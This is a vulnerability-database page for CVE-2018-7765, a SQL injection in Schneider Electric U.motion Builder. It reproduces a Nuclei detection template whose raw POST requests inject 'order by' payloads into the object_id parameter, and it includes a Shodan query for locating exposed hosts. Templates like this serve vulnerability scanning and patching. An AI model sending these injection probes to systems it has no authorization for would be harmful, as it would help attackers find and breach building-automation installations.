CVE-2018-7765: Schneider Electric U.motion Builder - SQL Injection

日期: 2026-01-16 | 影响软件: Schneider Electric U.motion Builder | POC: 已公开

漏洞描述

The vulnerability exists within processing of track_import_export.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. The underlying SQLite database query is subject to SQL injection on the object_id input parameter.

PoC代码[已公开]

id: CVE-2018-7765

info:
  name: Schneider Electric U.motion Builder - SQL Injection
  author: daffainfo
  severity: high
  description: |
    The vulnerability exists within processing of track_import_export.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. The underlying SQLite database query is subject to SQL injection on the object_id input parameter.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to version v1.3.4 or later.
  reference:
    - http://seclists.org/fulldisclosure/2019/May/26
    - https://www.schneider-electric.com/en/download/document/SEVD-2018-095-01/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-7765
    cwe-id: CWE-89
    epss-score: 0.18222
    epss-percentile: 0.94977
    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-requests: 2
    vendor: schneider-electric
    product: u.motion_builder
    shodan-query: http.headers_hash:1985490094
  tags: cve,cve2018,schneider-electric,sqli,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=1' order by 1-- -

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Object', 'Period') && !contains(body,'Invalid argument supplied for foreach')"
          - "contains(content_type, 'application/octet-stream')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=1' order by 2-- -

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Object', 'Period', 'Invalid argument supplied for foreach')"
          - "contains(content_type, 'application/octet-stream')"
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210085930bb42f61c149bd626fad5e414a5e914b6fc39c9224a0383c8c1b8c867ca5022100e8a561d4a468548ac09f6f3f282ee1a3f372ae85824978a4b5bf5ada95d5d151:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7765.yaml

相关漏洞推荐